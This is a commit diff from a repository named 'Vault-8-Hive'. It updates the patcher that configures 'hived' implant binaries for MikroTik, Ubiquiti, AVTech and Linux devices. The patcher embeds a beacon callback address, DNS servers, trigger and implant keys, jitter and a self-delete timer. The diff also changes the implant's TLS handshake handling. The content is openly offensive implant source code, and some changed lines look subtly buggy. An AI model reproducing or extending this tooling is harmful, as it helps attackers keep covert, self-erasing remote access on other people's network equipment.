STRLCPY/Vault-8-Hive

Merge of changes for MikroTik 6.x and AVTech (ARM v7).
User #142 committed 9 years ago

537aaa1b

2 parents
353a53c1
fbcd5cca

■ ■ ■ ■ ■ ■

client/Makefile.arch

		skipped 228 lines
229	229		printf "The following binaries were found:\n\n"
230	230		@ls -l ../server/hived-* \| grep -v dbg \| grep -v md5
231	231		printf "\n"
232		-
	232	+	printf "Generating header files...\n"
233	233		xxd -i $(UNPATCHED_LINUX_X86) _unpatched_linux_x86.h
234	234		xxd -i $(UNPATCHED_MIKROTIK_X86) _unpatched_mikrotik_x86.h
235	235		xxd -i $(UNPATCHED_MIKROTIK_MIPS) _unpatched_mikrotik_mips.h
		skipped 3 lines
239	239		xxd -i $(UNPATCHED_UBIQUITI_MIPS) _unpatched_ubiquiti_mips.h
240	240		xxd -i $(UNPATCHED_AVTECH_ARM) _unpatched_avtech_arm.h
241	241
	242	+	printf "Compiling patcher...\n"
242	243		$(CC) $(CFLAGS) -I. $(STRINGS)/string_utils.c patcher.c -o hive-patcher $(LIBSSL)
243	244		strip hive-patcher
244	245		md5sum hive-patcher > hive-patcher.md5
		skipped 11 lines

■ ■ ■ ■ ■ ■

client/hived-mikrotik-mipsel-unpatched

1 - ../server/hived-mikrotik-mipsel

All occurrences
■ ■ ■ ■ ■ ■

client/hived-solaris-sparc-unpatched

1 - ../server/hived-solaris-sparc

All occurrences
■ ■ ■ ■ ■ ■

client/hived-solaris-x86-unpatched

1 - ../server/hived-solaris-x86

All occurrences

■ ■ ■ ■ ■ ■

client/patcher.c

		skipped 11 lines
12	12		#include <time.h>
13	13		#include "trigger_protocols.h"
14	14
15		-	//#include "_unpatched_solaris_x86.h"
16	15		#include "_unpatched_linux_x86.h"
17	16		#include "_unpatched_mikrotik_x86.h"
18	17		#include "_unpatched_mikrotik_mips.h"
		skipped 8 lines
27	26		#include "polarssl/config.h"
28	27		#include "polarssl/sha1.h"
29	28
30		-	//#define HIVE_SOLARIS_X86_FILE "hived-solaris-x86-PATCHED"
31	29		#define HIVE_LINUX_X86_FILE "hived-linux-x86-PATCHED"
32	30		#define HIVE_MIKROTIK_X86_FILE "hived-mikrotik-x86-PATCHED"
33	31		#define HIVE_MIKROTIK_MIPS_FILE "hived-mikrotik-mips-PATCHED"
34		-	//#define HIVE_MIKROTIK_MIPSEL_FILE "hived-mikrotik-mipsel-PATCHED"
35	32		#define HIVE_MIKROTIK_PPC_FILE "hived-mikrotik-ppc-PATCHED"
36	33		#define HIVE_UBIQUITI_MIPS_FILE "hived-ubiquiti-mips-PATCHED"
37	34		#define HIVE_AVTECH_ARM_FILE "hived-avtech-arm-PATCHED"
38	35
39		-	//#define HIVE_SOLARIS_X86_UNPATCHED "hived-solaris-x86-UNpatched"
40	36		#define HIVE_LINUX_X86_UNPATCHED "hived-linux-x86-UNpatched"
41	37		#define HIVE_MIKROTIK_X86_UNPATCHED "hived-mikrotik-x86-UNpatched"
42	38		#define HIVE_MIKROTIK_MIPS_UNPATCHED "hived-mikrotik-mips-UNpatched"
43		-	//#define HIVE_MIKROTIK_MIPSEL_UNPATCHED "hived-mikrotik-mipsel-UNpatched"
44	39		#define HIVE_MIKROTIK_PPC_UNPATCHED "hived-mikrotik-ppc-UNpatched"
45	40		#define HIVE_UBIQUITI_MIPS_UNPATCHED "hived-ubiquiti-mips-UNpatched"
46	41		#define HIVE_AVTECH_ARM_UNPATCHED "hived-avtech-arm-UNpatched"
		skipped 16 lines
63	58		#define DEFAULT_BEACON_JITTER 3 // Default value is 3, range is from 0<=jitter<=30
64	59		#define DEFAULT_SELF_DELETE_DELAY 60 * 24 * 60 * 60 // Default value is 60 days...
65	60
66		-	struct cl_args {
67		-	unsigned int sig;
68		-	unsigned int beacon_port;
69		-	unsigned int host_len;
70		-	char beacon_ip[256];
71		-	char iface[16];
72		-	unsigned char idKey[ID_KEY_HASH_SIZE];
	61	+	typedef enum {FALSE=0, TRUE} boolean;
	62	+
	63	+	struct __attribute__ ((packed)) cl_args {
	64	+	unsigned int sig;
	65	+	unsigned int beacon_port;
	66	+	unsigned int trigger_delay;
73	67		unsigned long init_delay;
74	68		unsigned int interval;
75		-	unsigned int trigger_delay;
76	69		unsigned int jitter;
77		-	time_t delete_delay;
	70	+	unsigned long delete_delay;
	71	+	unsigned int patched;
	72	+	unsigned char idKey[ID_KEY_HASH_SIZE];
78	73		char sdpath[SD_PATH_LENGTH];
79		-	unsigned int patched;
80		-	} __attribute__ ((packed));
	74	+	char beacon_ip[256];
	75	+	char dns[2][16];
	76	+	};
81	77
82		-	struct cl_args args = {
83		-	SIG_HEAD,
84		-	DEFAULT_BEACON_PORT,
85		-	0,
86		-	{0},
87		-	{0},
88		-	{0},
89		-	DEFAULT_INITIAL_DELAY,
90		-	DEFAULT_BEACON_INTERVAL,
91		-	DEFAULT_TRIGGER_DELAY,
92		-	DEFAULT_BEACON_JITTER,
93		-	DEFAULT_SELF_DELETE_DELAY,
94		-	"/var",
95		-	1
	78	+	struct cl_args args = {
	79	+	SIG_HEAD,
	80	+	DEFAULT_BEACON_PORT,
	81	+	DEFAULT_TRIGGER_DELAY,
	82	+	DEFAULT_INITIAL_DELAY,
	83	+	DEFAULT_BEACON_INTERVAL,
	84	+	DEFAULT_BEACON_JITTER,
	85	+	DEFAULT_SELF_DELETE_DELAY,
	86	+	1,
	87	+	{0},
	88	+	{0},
	89	+	{0},
	90	+	{{0}}
96	91		};
97	92
98		-	typedef enum {FALSE=0, TRUE} boolean;
	93	+	//********************************************************************************
99	94
100	95		//define displaySha1Hash function
101	96		void printSha1Hash(FILE file, char tag, unsigned char *sha1Hash)
		skipped 8 lines
110	105
111	106		//********************************************************************************
112	107		int user_instructions(void);
113		-	//int local_gen_keys( char pubkeyfile, char privkeyfile, int keySz );
114	108		int patch(char filename, unsigned char hexarray, unsigned int arraylen, struct cl_args patched_args);
115	109		int non_patch(char filename, unsigned char hexarray, unsigned int arraylen);
116	110
		skipped 9 lines
126	120		fprintf(stdout, " %s-K <idKeyFile>%s - ID key filename (maximum 100 character path)\n", GREEN, RESET);
127	121		fprintf(stdout, " %s-k <ID Key Phrase>%s - ID key phrase (maximum 100 character string)\n", GREEN, RESET);
128	122		fprintf(stdout, " %s-j <b_jitter>%s - beacon jitter (integer of percent variance between 0 and 30 [0-30] )\n", GREEN, RESET);
129		-	// fprintf(stdout, " %s-I <interface>%s - Solaris Only - interface to listen for triggers\n", GREEN, RESET);
130	123		fprintf(stdout, " %s-P <file path>%s - (optional) self-delete control/log file directory path [default: /var]\n", GREEN, RESET);
131	124		fprintf(stdout, " %s-p <port>%s - (optional) beacon port [default: 443]\n", GREEN, RESET);
	125	+	fprintf(stdout, " %s-S <address>%s - IP address of the DNS server(s) (required if beacon address a is domain name\n", GREEN, RESET);
132	126		fprintf(stdout, " %s-s <sd_delay>%s - (optional) self delete delay since last successful trigger/beacon (in seconds) [default: 60 days]\n", GREEN, RESET);
133	127		fprintf(stdout, " %s-t <t_delay>%s - (optional) delay between trigger received & callback +/- 30 sec (in seconds) [default: 60 sec]\n", GREEN, RESET);
134	128		fprintf(stdout, " %s-m <OS>%s - (optional) target OS [default: 'all']. options:\n", GREEN, RESET);
		skipped 1 lines
136	130		fprintf(stdout, " * 'raw' - all unpatched\n");
137	131		fprintf(stdout, " * 'mt-x86'\n");
138	132		fprintf(stdout, " * 'mt-mips'\n");
139		-	// fprintf(stdout, " * 'mt-mipsel' (or 'mt-mipsle' (deprecated) )\n");
140	133		fprintf(stdout, " * 'mt-ppc'\n");
141	134		fprintf(stdout, " * 'linux-x86'\n");
142		-	// fprintf(stdout, " * 'sol-x86'\n");
143	135		fprintf(stdout, " * 'ub-mips'\n");
144	136		fprintf(stdout, " * 'avt-arm'\n");
145	137		fprintf(stdout, " %s[-h ]%s - print this usage\n\n", GREEN, RESET);
		skipped 24 lines
170	162		//********************************************************************************
171	163		int main(int argc, char **argv)
172	164		{
173		-	int optval;
174		-	int linux_x86 = 0; // Linux x86
175		-	// int solaris_x86 = 0; // Solaris x86
176		-	int mikrotik_x86 = 0; // MikroTik x86
177		-	int mikrotik_mips = 0; // MikroTik MIPS Big Endian
178		-	// int mikrotik_mipsel = 0; // MikroTik MIPS Little Endian
179		-	int mikrotik_ppc = 0; // MikroTik PowerPC [Big Endian]
180		-	int ubiquiti_mips = 0; // Ubiquiti MIPS Big Endian
181		-	int avtech_arm = 0; // AVTech ARM
182		-	int raw = 0; // unpatched versions
183		-	char host = (char ) NULL; // cached hostname for user confirmation message
184		-	FILE *implantIDFile; // Used to save implant keys and subsequent sha1 hashes...
185		-	time_t currentTime; // Time stamp for ID key generation
186		-	struct tm *idKeyTime; // Pointer to the ID key generation data structure
187		-	unsigned char implantKey[ID_KEY_HASH_SIZE];
188		-	unsigned char triggerKey[ID_KEY_HASH_SIZE];
189		-	boolean keyed = FALSE; // Boolean to verify that a key was entered
	165	+	int optval;
	166	+	int linux_x86 = 0; // Linux x86
	167	+	int mikrotik_x86 = 0; // MikroTik x86
	168	+	int mikrotik_mips = 0; // MikroTik MIPS Big Endian
	169	+	int mikrotik_ppc = 0; // MikroTik PowerPC [Big Endian]
	170	+	int ubiquiti_mips = 0; // Ubiquiti MIPS Big Endian
	171	+	int avtech_arm = 0; // AVTech ARM
	172	+	int raw = 0; // unpatched versions
190	173
191		-	args.sig = SIG_HEAD;
	174	+	char host = (char ) NULL; // cached hostname for user confirmation message
	175	+	FILE *implantIDFile; // Used to save implant keys and subsequent sha1 hashes...
	176	+	time_t currentTime; // Time stamp for ID key generation
	177	+	struct tm *idKeyTime; // Pointer to the ID key generation data structure
	178	+	unsigned char implantKey[ID_KEY_HASH_SIZE];
	179	+	unsigned char triggerKey[ID_KEY_HASH_SIZE];
	180	+	boolean keyed = FALSE; // Boolean to verify that a key was entered
192	181
193	182		implantKey[0] = '\0';
	183	+	args.sig = SIG_HEAD;
194	184
195		-	while ((optval = getopt(argc, argv, "+a:d:hI:i:j:K:k:m:P:p:s:t:")) != -1) {
	185	+	while ((optval = getopt(argc, argv, "+a:d:hI:i:j:K:k:m:P:p:S:s:t:")) != -1) {
196	186		switch (optval) {
197	187
198	188		case 'a': // Hostname / IP address of beacon LP
199		-	if (strlen(optarg) > sizeof(args.beacon_ip)) {
	189	+	if (strlen(optarg) >= sizeof(args.beacon_ip)) {
200	190		printf(" ERROR: Hostname or IP exceeds %d character limit\n", (int)sizeof(args.beacon_ip));
201	191		return -1;
202	192		}
203		-	/*
204		-	if ( inet_aton( optarg, &addr_check ) == 0 )
205		-	{
206		-	printf( " ERROR: invalid IP address specified\n" );
207		-	return -1;
208		-	}
209		-	*/
210		-	// save pointer to the unmodified user input. this is echo'd back to user
211		-	host = optarg;
212		-
213		-	// fill/initialize structure with random data
214		-	RandFill(args.beacon_ip, sizeof(args.beacon_ip));
215		-
216		-	args.host_len = strlen(optarg);
217		-	memcpy(args.beacon_ip, optarg, strlen(optarg));
218		-
219		-	// copy string representation of hostname or IP into the structure
220		-	memcpy(args.beacon_ip, optarg, args.host_len);
221		-
	193	+	host = optarg; // Save domain name or IP address for processing below
222	194		break;
223	195
224	196		case 'd': // initial delay
		skipped 3 lines
228	200		case 'h': // Help
229	201		usage(argv);
230	202		break;
231		-
232		-	#if 0 // Solairis (deprecated)
233		-	case 'I': // interface to listen for triggers. only needed for solaris
234		-	if (strlen(optarg) > sizeof(args.iface)) {
235		-	printf(" ERROR: Name of interface is too long\n");
236		-	return -1;
237		-	}
238		-	// copy string representation of interface name into patched structure
239		-	memcpy(args.iface, optarg, strlen(optarg));
240		-
241		-	break;
242		-	#endif
243	203
244	204		case 'i': // beacon interval
245	205		args.interval = (unsigned int) atoi(optarg) * 1000;
		skipped 102 lines
348	308		if (OPTMATCH(optarg, "mt-mips")) {mikrotik_mips = 1; break;}
349	309		if (OPTMATCH(optarg, "mt-mipsbe")) {mikrotik_mips = 1; break;}
350	310		if (OPTMATCH(optarg, "mt-x86")) {mikrotik_x86 = 1; break;}
351		-	// if (OPTMATCH(optarg, "sol-x86")) {solaris_x86 = 1; break;}
352	311		if (OPTMATCH(optarg, "linux-x86")) {linux_x86 = 1; break;}
353		-	// if (OPTMATCH(optarg, "mt-mipsel")) {mikrotik_mipsel = 1; break;}
354		-	// if (OPTMATCH(optarg, "mt-mipsle")) {mikrotik_mipsel = 1; break;}
355	312		if (OPTMATCH(optarg, "ub-mips")) {ubiquiti_mips = 1; break;}
356		-	if (OPTMATCH(optarg, "avt-mips")) {avtech_arm = 1; break;}
	313	+	if (OPTMATCH(optarg, "avt-arm")) {avtech_arm = 1; break;}
357	314		if (OPTMATCH(optarg, "raw")) {raw = 1; break;}
358	315
359	316		if (OPTMATCH(optarg, "all")) {linux_x86 = 1,
360		-	// solaris_x86 = 1,
361	317		mikrotik_x86 = 1,
362	318		mikrotik_mips = 1,
363		-	// mikrotik_mipsel = 1,
364	319		mikrotik_ppc = 1,
365	320		ubiquiti_mips = 1;
366	321		avtech_arm = 1;
		skipped 5 lines
372	327
373	328		case 'P': // Set path for self-delete control and log files
374	329		if (strlen(optarg) + 9 < SD_PATH_LENGTH) { // Make sure array is large enough for filename, '/' and '\0'
375		-	strcpy(args.sdpath, optarg); // Copy the path from the command line
	330	+	strcpy(args.sdpath, optarg); // Copy the path from the command line
376	331		} else {
377	332		fprintf(stderr, "ERROR: Directory path is too long (maximum 120 characters)");
378	333		return -1;
		skipped 8 lines
387	342		}
388	343		break;
389	344
	345	+	case 'S': // DNS Server address(es) -- a comma separated list of up to two dotted quad addresses
	346	+	{
	347	+	char *dns;
	348	+	char *address_list;
	349	+
	350	+	address_list = strdup(optarg);
	351	+
	352	+	// Get 1st DNS server address and validate its length
	353	+	if ((dns = strtok(address_list, ","))) {
	354	+	if (strlen(dns) > 16) {
	355	+	fprintf(stderr, "ERROR: DNS server address too long -- must be in dotted quad format (e.g. 192.168.53.53)\n");
	356	+	return -1;
	357	+	}
	358	+	memcpy(args.dns[0], dns, strlen(dns));
	359	+	} else {
	360	+	args.dns[0][0] = '\0';
	361	+	fprintf(stderr, "Missing DNS address\n");
	362	+	return -1;
	363	+	}
	364	+
	365	+	// Get 2nd DNS server address if it was entered and validate its length
	366	+	if ((dns = strtok(NULL, ","))) {
	367	+	if (strlen(dns) > 16) {
	368	+	fprintf(stderr, "ERROR: Second DNS server address too long -- must be in dotted quad format (e.g. 192.168.53.53)\n");
	369	+	return -1;
	370	+	}
	371	+	memcpy(args.dns[1], dns, strlen(dns));
	372	+	} else
	373	+	args.dns[1][0] = '\0';
	374	+	free(address_list);
	375	+	}
	376	+	break;
	377	+
390	378		case 's': // self delete delay
391	379		args.delete_delay = strtoul(optarg, NULL, 10);
392	380		break;
		skipped 15 lines
408	396		return -1;
409	397		}
410	398
	399	+	{ // Validate IP addressing - must have a valid IP or a domain name
	400	+	uint32_t beaconIPaddr = 0;
	401	+
	402	+	if (args.init_delay > 0) { // Beacons enabled
	403	+
	404	+	if (args.beacon_port == 0) {
	405	+	DLX(1, printf("No Beacon Port Specified!\n"));
	406	+	DLX(1, printUsage(argv[0]));
	407	+	}
	408	+
	409	+	// Obtain Beacon IP address
	410	+	if (strlen(host) == 0) {
	411	+	DLX(1, printf("No Beacon IP address specified!\n"));
	412	+	DLX(1, printUsage(argv[0]));
	413	+	return -1;
	414	+	}
	415	+
	416	+	RandFill(args.beacon_ip, sizeof(args.beacon_ip)); // Fill/initialize field with random data
	417	+	strcpy(args.beacon_ip, host); // Copy string representation of hostname or IP into the field including the null byte
	418	+	if (inet_pton(AF_INET, args.beacon_ip, &beaconIPaddr) <= 0) { // Determine if beacon IP is a valid address
	419	+	if (args.dns[0] == NULL) { // If not, verify that a DNS server address was specified
	420	+	DLX(1, printf("Beacon IP was specified as a domain name, but no valid DNS server address was specified to resolve the name!\n"));
	421	+	return -1;
	422	+	}
	423	+	}
	424	+	}
	425	+	}
	426	+
411	427		if (raw == 0) {
412	428		if ((args.beacon_port == 0) \|\| (args.interval == 0) \|\| (strlen(args.beacon_ip) == 0)) {
413	429		printf("\n");
		skipped 1 lines
415	431		usage(argv);
416	432		return -1;
417	433		}
418		-	//Enforce 0<=jitter<=30 jitter requirement.
	434	+	// Enforce 0 <= jitter <= 30 requirement.
419	435		if (((int) args.jitter < 0) \|\| (args.jitter > 30)) {
420	436		printf("\n");
421	437		printf(" %sError: Incorrect options%s\n", RED, RESET);
		skipped 2 lines
424	440		}
425	441
426	442		if ( (linux_x86 == 0) &&
427		-	// (solaris_x86 == 0) &&
428	443		(mikrotik_x86 == 0) &&
429	444		(mikrotik_mips == 0) && (mikrotik_ppc == 0) &&
430		-	// (mikrotik_mipsel == 0) &&
431	445		(ubiquiti_mips == 0) &&
432	446		(avtech_arm == 0)
433	447		) { // no OS was selected, so default is to build all
434	448		linux_x86 = 1;
435		-	// solaris_x86 = 1;
436	449		mikrotik_x86 = 1;
437	450		mikrotik_mips = 1;
438		-	// mikrotik_mipsel = 1;
439	451		mikrotik_ppc = 1;
440	452		ubiquiti_mips = 1;
441	453		avtech_arm = 1;
442	454		}
443	455
444		-	#if 0 // Solaris deprecated
445		-	if (solaris_x86 == 1) { // Solaris must have the interface patched in
446		-	if (strlen(args.iface) == 0) {
447		-	printf("\n");
448		-	printf(" ERROR: Incomplete options. %sSolaris%s requires an interface be selected.\n", RED, RESET);
449		-	usage(argv);
450		-	return -1;
451		-	}
452		-	}
453		-	#endif
454		-
455	456		printf("\n");
456	457		printf(" This application will generate PATCHED files with the following values:\n\n");
457	458		printf("\t%32s: %-s\n", "Beacon Server IP address", host);
458	459		printf("\t%32s: %-d\n", "Beacon Server Port number", args.beacon_port);
459		-	printf("\t%32s: ", "Trigger Key");
460		-	printSha1Hash(stdout, "", triggerKey); printf("\n");
461		-	printf("\t%32s: ", "Implant Key");
462		-	printSha1Hash(stdout, "", implantKey); printf("\n");
	460	+	printf("\t%32s: %-s\n", "Primary DNS Server IP address", args.dns[0]);
	461	+	printf("\t%32s: %-s\n", "Secondary DNS Server IP address", args.dns[1]);
	462	+	printf("\t%32s: ", "Trigger Key"); printSha1Hash(stdout, "", triggerKey); printf("\n");
	463	+	printf("\t%32s: ", "Implant Key"); printSha1Hash(stdout, "", implantKey); printf("\n");
463	464		printf("\t%32s: %-lu\n", "Beacon Initial Delay (sec)", args.init_delay / 1000);
464	465		printf("\t%32s: %-d\n", "Beacon Interval (sec)", args.interval / 1000);
465	466		printf("\t%32s: %-d\n", "Beacon Jitter (%)", args.jitter);
		skipped 1 lines
467	468		printf("\t%32s: %-s\n", "Self Delete Control File Path", args.sdpath);
468	469		printf("\t%32s: %-d\n", "Trigger Delay (+/-30 sec)", args.trigger_delay / 1000);
469	470		}
470		-
471		-	#if 0 // Solaris deprecated
472		-	if (solaris_x86 == 1) {
473		-	printf(" . Listening Interface -> %s (Solaris Only)\n", args.iface);
474		-	}
475		-	#endif
476		-
477		-	printf("\n");
478		-	printf(" Target Operating Systems:\n");
	471	+	;
	472	+	printf("\n Target Operating Systems:\n");
479	473
480	474		// little endian systems targets
481	475
482		-	if (linux_x86 == 1 \|\| raw == 1) {
483		-	printf(" . Linux/x86\n");
484		-	}
485		-
486		-	#if 0 // Solaris deprecated
487		-	if (solaris_x86 == 1 \|\| raw == 1) {
488		-	printf(" . Solaris/x86\n");
489		-	}
490		-	#endif
491		-
492		-	if (mikrotik_x86 == 1 \|\| raw == 1) {
493		-	printf(" . MikroTik/x86\n");
494		-	}
495		-
496		-	// if (mikrotik_mipsel == 1 \|\| raw == 1) {
497		-	// printf(" . MikroTik/MIPS (little endian)\n");
498		-	// }
499		-	// beginning of big endian targets
500		-
501		-	if (mikrotik_mips == 1 \|\| raw == 1) {
502		-	printf(" . MikroTik/MIPS\n");
503		-	}
504		-
505		-	if (mikrotik_ppc == 1 \|\| raw == 1) {
506		-	printf(" . MikroTik/PPC\n");
507		-	}
508		-
509		-	if (ubiquiti_mips == 1 \|\| raw == 1) {
510		-	printf(" . Ubiquiti/MIPS\n");
511		-	}
512		-
513		-	if (avtech_arm == 1 \|\| raw == 1) {
514		-	printf(" . AVTech/ARM\n");
515		-	}
	476	+	if (linux_x86 == 1 \|\| raw == 1) printf(" . Linux/x86\n");
	477	+	if (mikrotik_x86 == 1 \|\| raw == 1) printf(" . MikroTik/x86\n");
	478	+	if (mikrotik_mips == 1 \|\| raw == 1) printf(" . MikroTik/MIPS\n");
	479	+	if (mikrotik_ppc == 1 \|\| raw == 1) printf(" . MikroTik/PPC\n");
	480	+	if (ubiquiti_mips == 1 \|\| raw == 1) printf(" . Ubiquiti/MIPS\n");
	481	+	if (avtech_arm == 1 \|\| raw == 1) printf(" . AVTech/ARM\n");
516	482
517	483		if (raw == 0) {
	484	+	cl_string((unsigned char *) args.dns[0], sizeof(args.dns[0]));
	485	+	cl_string((unsigned char *) args.dns[1], sizeof(args.dns[1]));
518	486		cl_string((unsigned char *) args.beacon_ip, sizeof(args.beacon_ip));
519		-	cl_string((unsigned char *) args.iface, sizeof(args.iface));
520	487		cl_string((unsigned char *) args.sdpath, sizeof(args.sdpath));
521	488		}
522	489
523		-	// remove(HIVE_SOLARIS_X86_FILE);
524	490		remove(HIVE_LINUX_X86_FILE);
525	491		remove(HIVE_MIKROTIK_X86_FILE);
526	492		remove(HIVE_MIKROTIK_MIPS_FILE);
527		-	// remove(HIVE_MIKROTIK_MIPSEL_FILE);
528	493		remove(HIVE_MIKROTIK_PPC_FILE);
529	494		remove(HIVE_UBIQUITI_MIPS_FILE);
530	495		remove(HIVE_AVTECH_ARM_FILE);
531	496
532		-	// remove(HIVE_SOLARIS_X86_UNPATCHED);
533	497		remove(HIVE_LINUX_X86_UNPATCHED);
534	498		remove(HIVE_MIKROTIK_X86_UNPATCHED);
535	499		remove(HIVE_MIKROTIK_MIPS_UNPATCHED);
536		-	// remove(HIVE_MIKROTIK_MIPSEL_UNPATCHED);
537	500		remove(HIVE_MIKROTIK_PPC_UNPATCHED);
538	501		remove(HIVE_UBIQUITI_MIPS_UNPATCHED);
539	502		remove(HIVE_AVTECH_ARM_UNPATCHED);
540	503
541	504		sleep(1);
542	505
543		-	// local_gen_keys( PUBKEYFILE, PRIVKEYFILE, KEY_SIZE );
544		-
545	506		if (raw == 1) {
546	507		printf("\n");
547	508		non_patch(HIVE_LINUX_X86_UNPATCHED, hived_linux_x86_unpatched, hived_linux_x86_unpatched_len);
548		-	// non_patch(HIVE_SOLARIS_X86_UNPATCHED, hived_solaris_x86_unpatched, hived_solaris_x86_unpatched_len);
549	509		non_patch(HIVE_MIKROTIK_X86_UNPATCHED, hived_mikrotik_x86_unpatched, hived_mikrotik_x86_unpatched_len);
550		-	// non_patch(HIVE_MIKROTIK_MIPSEL_UNPATCHED, hived_mikrotik_mipsel_unpatched, hived_mikrotik_mipsel_unpatched_len);
551	510		non_patch(HIVE_MIKROTIK_MIPS_UNPATCHED, hived_mikrotik_mips_unpatched, hived_mikrotik_mips_unpatched_len);
552	511		non_patch(HIVE_MIKROTIK_PPC_UNPATCHED, hived_mikrotik_ppc_unpatched, hived_mikrotik_ppc_unpatched_len);
553	512		non_patch(HIVE_UBIQUITI_MIPS_UNPATCHED, hived_ubiquiti_mips_unpatched, hived_ubiquiti_mips_unpatched_len);
		skipped 3 lines
557	516		// is changed to Big Endian. Since these changes are made in a global variable used by all
558	517		// parsers, check for Little Endian variants first and the Big Endian possibilities next.
559	518
560		-	if (linux_x86 == 1) {
561		-	patch(HIVE_LINUX_X86_FILE, hived_linux_x86_unpatched, hived_linux_x86_unpatched_len, args);
562		-	}
563		-
564		-	#if 0 // Solaris no longer supported
565		-	if (solaris_x86 == 1) {
566		-	patch(HIVE_SOLARIS_X86_FILE, hived_solaris_x86_unpatched, hived_solaris_x86_unpatched_len, args);
567		-	}
568		-	#endif
569		-
570		-	if (mikrotik_x86 == 1) {
571		-	patch(HIVE_MIKROTIK_X86_FILE, hived_mikrotik_x86_unpatched, hived_mikrotik_x86_unpatched_len, args);
572		-	}
573		-
574		-	if (avtech_arm == 1) {
575		-	patch(HIVE_AVTECH_ARM_FILE, hived_avtech_arm_unpatched, hived_avtech_arm_unpatched_len, args);
576		-	}
577		-
578		-	#if 0 // MikroTik little-endian no longer supported
579		-	if (mikrotik_mipsel == 1) {
580		-	patch(HIVE_MIKROTIK_MIPSEL_FILE, hived_mikrotik_mipsel_unpatched, hived_mikrotik_mipsel_unpatched_len, args);
581		-	}
582		-	#endif
583		-
584		-	if (mikrotik_ppc == 1) {
585		-	patch(HIVE_MIKROTIK_PPC_FILE, hived_mikrotik_ppc_unpatched, hived_mikrotik_ppc_unpatched_len, args);
586		-	}
587		-
588		-	if (mikrotik_mips == 1) {
589		-	patch(HIVE_MIKROTIK_MIPS_FILE, hived_mikrotik_mips_unpatched, hived_mikrotik_mips_unpatched_len, args);
590		-	}
591		-
592		-	if (ubiquiti_mips == 1) {
593		-	patch(HIVE_UBIQUITI_MIPS_FILE, hived_ubiquiti_mips_unpatched, hived_ubiquiti_mips_unpatched_len, args);
594		-	}
	519	+	if (linux_x86 == 1) patch(HIVE_LINUX_X86_FILE, hived_linux_x86_unpatched, hived_linux_x86_unpatched_len, args);
	520	+	if (mikrotik_x86 == 1) patch(HIVE_MIKROTIK_X86_FILE, hived_mikrotik_x86_unpatched, hived_mikrotik_x86_unpatched_len, args);
	521	+	if (avtech_arm == 1) patch(HIVE_AVTECH_ARM_FILE, hived_avtech_arm_unpatched, hived_avtech_arm_unpatched_len, args);
	522	+	if (mikrotik_ppc == 1) patch(HIVE_MIKROTIK_PPC_FILE, hived_mikrotik_ppc_unpatched, hived_mikrotik_ppc_unpatched_len, args);
	523	+	if (mikrotik_mips == 1) patch(HIVE_MIKROTIK_MIPS_FILE, hived_mikrotik_mips_unpatched, hived_mikrotik_mips_unpatched_len, args);
	524	+	if (ubiquiti_mips == 1) patch(HIVE_UBIQUITI_MIPS_FILE, hived_ubiquiti_mips_unpatched, hived_ubiquiti_mips_unpatched_len, args);
595	525		printf("\n");
596	526
597	527		return 0;
		skipped 66 lines
664	594
665	595		printf(" SIG_HEAD found at offset 0x%x for %s\n", (int)(--p - hexarray), filename);
666	596
667		-	// memcpy( p + sizeof( SIG_HEAD ), keybuffer, 128 );
668	597		if (big_endian == 0) {
669	598		memcpy(p, &copy_of_args, sizeof(struct cl_args));
670	599		} else if (big_endian == 1) {
671	600		copy_of_args.sig = htonl(copy_of_args.sig);
672	601		copy_of_args.beacon_port = htonl(copy_of_args.beacon_port);
673		-	copy_of_args.host_len = htonl(copy_of_args.host_len);
674		-
675		-	//How do I convert array of sha1 hash into network byte order for different endian type of machines...
676		-	memcpy(copy_of_args.idKey, copy_of_args.idKey, 20 * sizeof(unsigned char));
677		-	//copy_of_args.idKey = htonl( &copy_of_args.idKey );
678		-
679	602		copy_of_args.init_delay = htonl(copy_of_args.init_delay);
680	603		copy_of_args.interval = htonl(copy_of_args.interval);
681	604		copy_of_args.jitter = htonl(copy_of_args.jitter);
		skipped 30 lines

■ ■ ■ ■ ■ ■

common/Makefile-include.ubiquiti-mips

1	1		#------------------------------------------------
2		-	# Makefile include for ubiquiti-mips
	2	+	# Makefile include for mikrotik-mips (big-endian)
3	3		#------------------------------------------------
4	4		BUILDROOT=/opt/buildroot/buildroot-2010.11-mipsbe/output/staging/usr
5	5		ARCH=mips
		skipped 7 lines
13	13
14	14		CFLAGS += -I$(UCLIBC_HDRS) -L$(UCLIBC_LIBS)
15	15		CFLAGS += -DLINUX -DUBIQUITI -D_MIPS -static
16		-	CFLAGS += -D_MIPS_SZPTR=32 -D_BIG_ENDIAN
	16	+	CFLAGS += -D_MIPS_SZPTR=32 -D_BIG_ENDIAN -D__BYTE_ORDER=BIG_ENDIAN
17	17		CFLAGS += -DUCLIBC
	18	+	CFLAGS += -D_IPCONFIG -D_NETSTAT_AN -D_NETSTAT_RN -D_PS_EF -D_USE_ASH -D_GNU_SOURCE
18	19
19	20		LDFLAGS += -lutil
20	21
		skipped 2 lines

■ ■ ■ ■ ■ ■

common/crypto/crypto.c

		skipped 177 lines
178	178		DLX(4, printf("\tPerforming the TLS handshake... \n"));
179	179
180	180		while ((ret = ssl_handshake(ioc->ssl)) != 0) {
181		-	if (ret != POLARSSL_ERR_NET_WANT_WRITE) {
182		-	DLX(4, printf("TLS handshake failed"); print_ssl_error(ret));
	181	+	if (ret == POLARSSL_ERR_SSL_CONN_EOF)
	182	+	DLX(4, printf("\tNormal reset by Blot Proxy: "); print_ssl_error(ret));
	183	+	return -1;
	184	+	if (ret != POLARSSL_ERR_NET_WANT_WRITE && ret != POLARSSL_ERR_SSL_CONN_EOF) {
	185	+	DLX(4, printf("\tTLS handshake failed: "); print_ssl_error(ret));
183	186		return -1;
184	187		}
185	188		}
		skipped 76 lines
262	265		DLX(8, printf("Bytes sent: %u\n", (unsigned int)sent));
263	266
264	267		ret = (ret < 0) ? ret : (int)size; //Return the number of (unencrypted) bytes sent or the error code
265		-	DLX(4, printf("Return value: 0x%04x\n", ret));
	268	+	DLX(6, printf("Return value: 0x%04x\n", ret));
266	269		if (ioc->encrypt)
267	270		free(encbuf); // Clean-up
268	271		return ret;
		skipped 450 lines

■ ■ ■ ■ ■ ■

common/polarssl-1.1.8/library/Makefile

		skipped 60 lines
61	61		CFLAGS += -DDEBUG -D_DEBUG -g -O0
62	62		endif
63	63		ifeq ("$(DEBUG)", "3")
64		-	CFLAGS += -DPOLARSSL_DEBUG_C -DPOLARSSL_DEBUG_MSG -DPOLARSSL_SSL_DEBUG_ALL -DPOLARSSL_SELF_TEST
